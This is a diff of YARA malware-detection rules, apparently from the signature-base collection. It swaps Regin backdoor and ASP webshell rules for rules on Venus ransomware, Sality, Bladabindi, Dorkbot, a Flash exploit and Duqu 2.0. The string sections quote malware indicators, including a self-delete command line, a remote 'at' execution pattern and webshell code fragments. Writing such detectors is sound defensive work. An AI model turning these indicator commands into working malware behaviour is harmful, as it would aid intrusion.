-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L126-L143"
+		description = "Detects Venus Ransomware samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0f7e0ca4-c5e2-5557-92de-2e0d73035f12"
+		date = "2022-11-16"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/dyngnosis/status/1592588860168421376"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_venus.yar#L3-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5164edc1d54f10b7cb00a266a1b52c623ab005e2"
-		logic_hash = "2b1fdc2cc8c0aedaf749ee0e87a8853b91735a4e215c65df221a930d4b1d02f7"
-		score = 75
+		logic_hash = "3c94d59015897f180ef55608a2761b37c7b52193e28895ea6a4c0548acf3ad34"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		hash1 = "46f9cbc3795d6be0edd49a2c43efe6e610b82741755c5076a89eeccaf98ee834"
+		hash2 = "6d8e2d8f6aeb0f4512a53fe83b2ef7699513ebaff31735675f46d1beea3a8e05"
+		hash3 = "931cab7fbc0eb2bbc5768f8abdcc029cef76aff98540d9f5214786dccdb6a224"
+		hash4 = "969bfe42819e30e35ca601df443471d677e04c988928b63fccb25bf0531ea2cc"
+		hash5 = "db6fcd33dcb3f25890c28e47c440845b17ce2042c34ade6d6508afd461bfa21c"
+		hash6 = "ee036f333a0c4a24d9aa09848e635639e481695a9209474900eb71c9e453256b"
+		hash7 = "fa7ba459236c7b27a0429f1961b992ab87fc8b3427469fd98bfc272ae6852063"
 
 	strings:
-		$s0 = "Service Control Manager" fullword ascii
-		$s1 = "_vsnwprintf" ascii
-		$s2 = "Root Agency" fullword ascii
-		$s3 = "Root Agency0" fullword ascii
-		$s4 = "StartServiceCtrlDispatcherA" fullword ascii
-		$s5 = "\\\\?\\UNC" fullword wide
-		$s6 = "%ls%ls" fullword wide
+		$x1 = "<html><head><title>Venus</title><style type = \"text" ascii fullword
+		$x2 = "xXBLTZKmAu9pjcfxrIK4gkDp/J9XXATjuysFRXG4rH4=" ascii fullword
+		$x3 = "%s%x%x%x%x.goodgame" wide fullword
+		$s1 = "/c ping localhost -n 3 > nul & del %s" ascii fullword
+		$s2 = "C:\\Windows\\%s.png" wide
+		$op1 = { 8b 4c 24 24 46 8b 7c 24 14 41 8b 44 24 30 81 c7 00 04 00 00 81 44 24 10 00 04 00 00 40 }
+		$op2 = { 57 c7 45 fc 00 00 00 00 7e 3f 50 33 c0 74 03 9b 6e }
+		$op3 = { 66 89 45 d4 0f 11 45 e8 e8 a8 e7 ff ff 83 c4 14 8d 45 e8 50 8d 45 a4 50 }
 
 	condition:
-		all of them and filesize < 15KB and filesize > 10KB
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( pe.imphash ( ) == "bb2600e94092da119ee6acbbd047be43" or 1 of ( $x* ) or 2 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_Regin_Sample_1 : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_A : FILE
 {
 	meta:
-		description = "Semiautomatically generated YARA rule - file-3665415_sys"
-		author = "Florian Roth"
-		id = "13478652-155f-52ba-af16-53f27c92e052"
-		date = "2014-11-25"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L145-L174"
+		description = "Detects an unspecififed malware - October 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f62ecf7e-2b66-5567-9bf3-3d3797bc582d"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L10-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "773d7fab06807b5b1bc2d74fa80343e83593caf2"
-		logic_hash = "e8291b4a68924dccdd825ee2cc8930acb794e92e0302598872ec78eb0bf8504f"
-		score = 70
+		logic_hash = "d71e6640be1b10790d49c084b9ba248e35a6a56dfe9c5a3f219a209024ebec27"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d112a7e21902287e4a37112bf17d7c73a7b206e7bc81780fd87991c1519f38c8"
 
 	strings:
-		$s0 = "Getting PortName/Identifier failed - %x" fullword ascii
-		$s1 = "SerialAddDevice - error creating new devobj [%#08lx]" fullword ascii
-		$s2 = "External Naming Failed - Status %x" fullword ascii
-		$s3 = "------- Same multiport - different interrupts" fullword ascii
-		$s4 = "%x occurred prior to the wait - starting the" fullword ascii
-		$s5 = "'user registry info - userPortIndex: %d" fullword ascii
-		$s6 = "Could not report legacy device - %x" fullword ascii
-		$s7 = "entering SerialGetPortInfo" fullword ascii
-		$s8 = "'user registry info - userPort: %x" fullword ascii
-		$s9 = "IoOpenDeviceRegistryKey failed - %x " fullword ascii
-		$s10 = "Kernel debugger is using port at address %X" fullword ascii
-		$s12 = "Release - freeing multi context" fullword ascii
-		$s13 = "Serial driver will not load port" fullword ascii
-		$s14 = "'user registry info - userAddressSpace: %d" fullword ascii
-		$s15 = "SerialAddDevice: Enumeration request, returning NO_MORE_ENTRIES" fullword ascii
-		$s20 = "'user registry info - userIndexed: %d" fullword ascii
-		$fp1 = "Enter SerialBuildResourceList" ascii fullword
+		$x1 = "%s\\system32\\%s.dll" fullword ascii
+		$x2 = "%SystemRoot%\\System32\\svch%s -k nets" fullword ascii
+		$x3 = "\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A" fullword ascii
+		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword ascii
+		$s2 = "boottemp.exe" fullword ascii
+		$s3 = "at \\\\%s %d:%d C:\\%s.exe" fullword ascii
+		$s4 = "cryptcom.dll" fullword ascii
+		$s5 = "Wininet.dll" fullword ascii
+		$s6 = "\\\\%s\\%s\\%s.exe" fullword ascii
+		$s7 = "%s%d.exe" fullword ascii
+		$s8 = "booter.exe" fullword ascii
+		$s9 = "\\\\%s\\pipe%s" fullword ascii
+		$s10 = "C:\\DelInfo.bin" fullword ascii
+		$op0 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
+		$op1 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
+		$op2 = { ee 11 74 cf 73 0b 91 c4 c9 57 b2 d9 36 86 a5 b4 }
 
 	condition:
-		all of them and filesize < 110KB and filesize > 80KB and not $fp1
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $x* ) or 3 of ( $s* ) or all of ( $op* ) ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_Regin_Sample_2 : FILE
+rule SIGNATURE_BASE_Sality_Malware_Oct16 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file hiddenmod_hookdisk_and_kdbg_8949d000.bin"
-		author = "@MalwrSignatures"
-		id = "1091a598-e964-5f67-9267-531d66831bee"
-		date = "2014-11-26"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L176-L203"
+		description = "Detects an unspecififed malware - October 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7bf2a818-f7ee-587e-b22e-b557251d89e1"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L48-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a7b285d4b896b66fce0ebfcd15db53b3a74a0400"
-		logic_hash = "a11d03d10661c1fc094450b250056196e5d8d16bd171eba9e37c7524aa2301d2"
-		score = 75
+		logic_hash = "5bf14bbb0a7298a7bc896029c4b92ef9adf24307e4d05dcf86a518b266d1c2a8"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8eaff5e1d4b55dd6e25f007549271da10afd1fa25064d7105de0ca2735487aad"
 
 	strings:
-		$s0 = "\\SYSTEMROOT\\system32\\lsass.exe" wide
-		$s1 = "atapi.sys" fullword wide
-		$s2 = "disk.sys" fullword wide
-		$s3 = "IoGetRelatedDeviceObject" fullword ascii
-		$s4 = "HAL.dll" fullword ascii
-		$s5 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services" ascii
-		$s6 = "PsGetCurrentProcessId" fullword ascii
-		$s7 = "KeGetCurrentIrql" fullword ascii
-		$s8 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
-		$s9 = "KeSetImportanceDpc" fullword ascii
-		$s10 = "KeQueryPerformanceCounter" fullword ascii
-		$s14 = "KeInitializeEvent" fullword ascii
-		$s15 = "KeDelayExecutionThread" fullword ascii
-		$s16 = "KeInitializeTimerEx" fullword ascii
-		$s18 = "PsLookupProcessByProcessId" fullword ascii
-		$s19 = "ExReleaseFastMutexUnsafe" fullword ascii
-		$s20 = "ExAcquireFastMutexUnsafe" fullword ascii
+		$s1 = "Hello world!" fullword wide
+		$s2 = "[LordPE]" fullword ascii
 
 	condition:
-		all of them and filesize < 40KB and filesize > 30KB
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Regin_Sample_3 : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_C : FILE
 {
 	meta:
-		description = "Detects Regin Backdoor sample fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
-		author = "@Malwrsignatures"
-		id = "eefc174f-4b17-5c90-8478-3eaaf80e9a78"
-		date = "2014-11-27"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L205-L230"
+		description = "Detects an unspecififed malware - October 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fff98097-a19a-59aa-bece-837c75b0995c"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L65-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fe1419e9dde6d479bd7cda27edd39fafdab2668d498931931a2769b370727129"
-		logic_hash = "5a0f77f203765f7737c00c3df760ea7f3ed354559aad07f3053173ff09e1ce1a"
-		score = 75
+		logic_hash = "1f212ef700e77c82954d997beef1157835da38330b583d02df418e10b6c182ee"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a451157f75627b2fef3d663946c94ef7dacb58f08b31d0ec4c0a542a1c4e6205"
 
 	strings:
-		$s0 = "Service Pack x" fullword wide
-		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" wide
-		$s2 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" wide
-		$s3 = "mntoskrnl.exe" fullword wide
-		$s4 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager\\Memory Management" wide
-		$s5 = "Memory location: 0x%p, size 0x%08x" wide fullword
-		$s6 = "Service Pack" fullword wide
-		$s7 = ".sys" fullword wide
-		$s8 = ".dll" fullword wide
-		$s10 = "\\REGISTRY\\Machine\\Software\\Microsoft\\Updates" wide
-		$s11 = "IoGetRelatedDeviceObject" fullword ascii
-		$s12 = "VMEM.sys" fullword ascii
-		$s13 = "RtlGetVersion" fullword wide
-		$s14 = "ntkrnlpa.exe" fullword ascii
+		$s1 = "dUSER32.DLL" fullword wide
+		$s2 = "output.dll" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0xfedcbafe and all of ( $s* ) and filesize > 160KB and filesize < 200KB
+		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them )
 }
-rule SIGNATURE_BASE_Regin_Sample_Set_2 : FILE
+rule SIGNATURE_BASE_Bladabindi_Malware_B64 : FILE
 {
 	meta:
-		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
-		author = "@MalwrSignatures"
-		id = "0b21091d-413e-54dd-83d1-5d824fb013f2"
-		date = "2014-11-26"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L232-L264"
+		description = "Detects Bladabindi Malware using Base64 encoded strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7f7023be-b6e1-5e1b-af8a-c413a5438ec8"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L91-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26125cea704532cbc22df46af228299ae810bce60938bee7b067ed273158d76f"
+		logic_hash = "081a6361e29fc231f1467b837c51a39b8cccf8caa20844b22d469ce2bbd0c7fb"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
-		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dda668b0792b7679979e61f2038cf9a8ec39415cc161be00d2c8301e7d48768d"
 
 	strings:
-		$s0 = "HAL.dll" fullword ascii
-		$s1 = "IoGetDeviceObjectPointer" fullword ascii
-		$s2 = "MaximumPortsServiced" fullword wide
-		$s3 = "KeGetCurrentIrql" fullword ascii
-		$s4 = "ntkrnlpa.exe" fullword ascii
-		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
-		$s6 = "ConnectMultiplePorts" fullword wide
-		$s7 = "\\SYSTEMROOT" wide
-		$s8 = "IoWriteErrorLogEntry" fullword ascii
-		$s9 = "KeQueryPerformanceCounter" fullword ascii
-		$s10 = "KeServiceDescriptorTable" fullword ascii
-		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
-		$s12 = "SeSinglePrivilegeCheck" fullword ascii
-		$s13 = "KeInitializeEvent" fullword ascii
-		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
-		$s15 = "KeRemoveDeviceQueue" fullword ascii
-		$s16 = "IofCompleteRequest" fullword ascii
-		$s17 = "KeInitializeSpinLock" fullword ascii
-		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
-		$s19 = "IoCreateDevice" fullword ascii
-		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
+		$s1 = "XHN5c3RlbTMyXA==" fullword ascii
+		$s2 = "RXhlY3V0ZSBFUlJPUg==" fullword ascii
+		$s3 = "dHJvamFuLmV4ZQ==" fullword ascii
+		$s4 = "VXBkYXRlIEVSUk9S" fullword ascii
+		$s5 = "RG93bmxvYWQgRVJST1I=" fullword ascii
 
 	condition:
-		filesize < 40KB and filesize > 30KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_Regin_Sample_Set_1 : FILE
+rule SIGNATURE_BASE_Dorkbot_Injector_Malware : FILE
 {
 	meta:
-		description = "Detects Regin Backdoor sample"
-		author = "@MalwrSignatures"
-		id = "b0f24a0b-10e7-5549-a300-516df8644cb0"
-		date = "2014-11-27"
-		modified = "2023-01-06"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L266-L296"
+		description = "Detects Darkbot Injector"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b32986fe-d6f1-55f2-8d50-bc348b52fb49"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L110-L129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7402f409e7dd3180d8e6fe017af19d0a1d0dd86f85279191db1bc8f6c94951ac"
+		logic_hash = "36138520b0d39dc311b8e9355d1d1c215908a5fe1c01eec76c689f7e74a84303"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
-		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "bc3c5ac7180c8ac21d6908d747aa6122154d2bb51bb99ff0e0b1c65088d275dc"
 
 	strings:
-		$hd = { fe ba dc fe }
-		$s0 = "d%ls%ls" fullword wide
-		$s1 = "\\\\?\\UNC" fullword wide
-		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
-		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
-		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
-		$s6 = "\\\\.\\Global\\%s" fullword wide
-		$s7 = "temp" fullword wide
-		$s8 = "\\\\.\\%s" fullword wide
-		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
-		$s10 = "sscanf" fullword ascii
-		$s11 = "disp.dll" fullword ascii
-		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
-		$s13 = "%d.%d.%d.%d%c" fullword ascii
-		$s14 = "imagehlp.dll" fullword ascii
-		$s15 = "%hd %d" fullword ascii
+		$s1 = "Enter an integer, a real number, a character and a string : " fullword ascii
+		$s2 = "ready to finish" fullword ascii
+		$s3 = "EYEnpw" fullword ascii
+		$s4 = "somewhere i belong" fullword ascii
+		$s5 = "Not all fields were assigned" fullword ascii
+		$s6 = "take down" fullword ascii
+		$s7 = "real number = %f" fullword ascii
 
 	condition:
-		($hd at 0 ) and all of ( $s* ) and filesize < 450KB and filesize > 360KB
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 6 of them )
 }
-rule SIGNATURE_BASE_Apt_Regin_Legspin : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_D : FILE
 {
 	meta:
-		description = "Rule to detect Regin's Legspin module"
-		author = "Kaspersky Lab"
-		id = "2abd3605-d9bf-53f0-8521-ac8dc18d9fce"
-		date = "2015-01-22"
-		date = "2023-01-27"
-		modified = "2024-04-24"
-		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L298-L319"
+		description = "Detects unspecified malware - October 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6908467c-1ed6-508d-9503-246dd26823e5"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L131-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "29105f46e4d33f66fee346cfd099d1cc"
-		logic_hash = "1b026f475fdbb3c97f33895520844fa4944eb2fffc0883502a6cb79162bbd388"
+		logic_hash = "78cde422987d2aff64967b86b6cf9279c112a2bfb713a2ea40fe952379d2e326"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cd5f3bc0176a6803093ffdea6a7442c416e0d2945b6903063d17f5bb8d17519d"
 
 	strings:
-		$a1 = "sharepw"
-		$a2 = "reglist"
-		$a3 = "logdump"
-		$a4 = "Name:" wide
-		$a5 = "Phys Avail:"
-		$a6 = "cmd.exe" wide
-		$a7 = "ping.exe" wide
-		$a8 = "millisecs"
+		$s1 = "C:\\file.exe" fullword wide
+		$s2 = "new.exe" fullword wide
+		$s3 = "passwordIterations" fullword ascii
+		$op0 = { 10 00 12 00 1a 00 05 00 01 00 01 00 01 00 10 00 }
+		$op1 = { 41 32 00 36 00 62 00 34 00 32 00 65 00 37 00 62 }
+		$op2 = { 3c 4d 6f 64 75 6c 65 3e 00 6e 65 77 2e 65 78 65 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $a* )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Apt_Regin_Hopscotch : FILE
+rule SIGNATURE_BASE_Unspecified_Malware_Oct16_E : FILE
 {
 	meta:
-		description = "Rule to detect Regin's Hopscotch module"
-		author = "Kaspersky Lab"
-		id = "907042ba-8e64-5ca7-9a83-70c28af1ab99"
-		date = "2015-01-22"
-		date = "2023-01-27"
-		modified = "2024-04-24"
-		reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L321-L342"
+		description = "Detects unspecified Malware - October 2016"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fffffe0c-e114-5648-96ea-dd692610e34c"
+		date = "2016-10-08"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_malware_set_oct16.yar#L152-L167"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6c34031d7a5fc2b091b623981a8ae61c"
-		logic_hash = "33b5fa61aaa802a60f3d42d59eb474222841a8a557b06b23a9e325e922e2cec1"
+		logic_hash = "2040a8cee840560a5aa6065df17206c0313d85b2d11ce482baab05c492360f35"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "28093385130b61f22920c0ce6e56de1f2cd8eef589bebe2af31f36f51f2b4d01"
 
 	strings:
-		$a1 = "AuthenticateNetUseIpc"
-		$a2 = "Failed to authenticate to"
-		$a3 = "Failed to disconnect from"
-		$a4 = "%S\\ipc$" wide
-		$a5 = "Not deleting..."
-		$a6 = "CopyServiceToRemoteMachine"
-		$a7 = "DH Exchange failed"
-		$a8 = "ConnectToNamedPipes"
+		$s1 = "P3pORt" fullword ascii
+		$s2 = "msdownld.tmp" fullword ascii
+		$s3 = "TMP4351$.TMP" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $a* )
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_Regin_Related_Malware
+rule SIGNATURE_BASE_Flash_CVE_2015_5119_APT3_Leg : CVE_2015_5119 FILE
 {
 	meta:
-		description = "Malware Sample - maybe Regin related"
+		description = "Exploit Sample CVE-2015-5119"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9377dd52-244f-5289-a2a3-88b6377b2dd2"
-		date = "2015-06-03"
-		modified = "2024-04-24"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L344-L367"
+		id = "d9efaea3-0644-501a-990b-665e257beb86"
+		date = "2015-08-01"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2015_5119.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "76c355bfeb859a347e38da89e3d30a6ff1f94229"
-		logic_hash = "61ce7a69ab357740158e355455362a4f5fddc67ee60af120733f509e7407216f"
+		logic_hash = "99af6b9ecc18b87b14968eb8fffefac7be10dd727d8af2d0488fae4a96196e85"
 		score = 70
 		quality = 85
-		tags = ""
+		tags = "CVE-2015-5119, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		yaraexchange = "No distribution without author's consent"
 
 	strings:
-		$s1 = "%c%s%c -p %d -e %d -pv -c \"~~[%x] s; .%c%c%s %s /u %s_%d.dmp; q\"" fullword wide
-		$s0 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
-		$s2 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
-		$s3 = "disp.dll" fullword ascii
-		$s4 = "msvcrtd.dll" fullword ascii
-		$s5 = "%d.%d.%d.%d%c" fullword ascii
-		$s6 = "%ls_%08x" fullword wide
-		$s8 = "d%ls%ls" fullword wide
-		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
+		$s0 = "HT_exploit" fullword ascii
+		$s1 = "HT_Exploit" fullword ascii
+		$s2 = "flash_exploit_" ascii
+		$s3 = "exp1_fla/MainTimeline" ascii fullword
+		$s4 = "exp2_fla/MainTimeline" ascii fullword
+		$s5 = "_shellcode_32" ascii
+		$s6 = "todo: unknown 32-bit target" fullword ascii
 
 	condition:
-		$s1 or 3 of ( $s* )
+		uint16( 0 ) == 0x5746 and 1 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASP_Embedded_Mar21_1 : FILE
+rule SIGNATURE_BASE_APT_Apt_Duqu2_Loaders : FILE
 {
 	meta:
-		description = "Detects ASP webshells"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7cf7db9d-8f8a-51db-a0e6-84748e8f9e1f"
-		date = "2021-03-05"
+		description = "Rule to detect Duqu 2.0 samples"
+		author = "Kaspersky Lab"
+		id = "22db52c2-18e7-537e-a9c5-38ccfd3a0d30"
+		date = "2015-06-09"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L2-L16"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L10-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4a8b4cea6f53dad9771cb694ec55f305f04dfdbd8e663154cad672ca414c138c"
-		score = 85
-		quality = 85
+		logic_hash = "79f205745e61b55c43c239d9da9086fd72312ea2741351183d32f7c227174ff8"
+		score = 75
+		quality = 83
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$s1 = "<script runat=\"server\">" nocase
-		$s2 = "new System.IO.StreamWriter(Request.Form["
-		$s3 = ".Write(Request.Form["
+		$a1 = "{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
+		$a2 = "\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
+		$a4 = "\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide
+		$a5 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide
+		$a8 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" wide
+		$a9 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" wide
+		$a7 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" wide
+		$b1 = "MSI.dll"
+		$b2 = "msi.dll"
+		$b3 = "StartAction"
+		$c1 = "msisvc_32@" wide
+		$c2 = "PROP=" wide
+		$c3 = "-Embedding" wide
+		$c4 = "S:(ML;;NW;;;LW)" wide
+		$d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase
+		$d2 = {2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 40 40 40 73 74 64 40 40}
 
 	condition:
-		filesize < 100KB and all of them
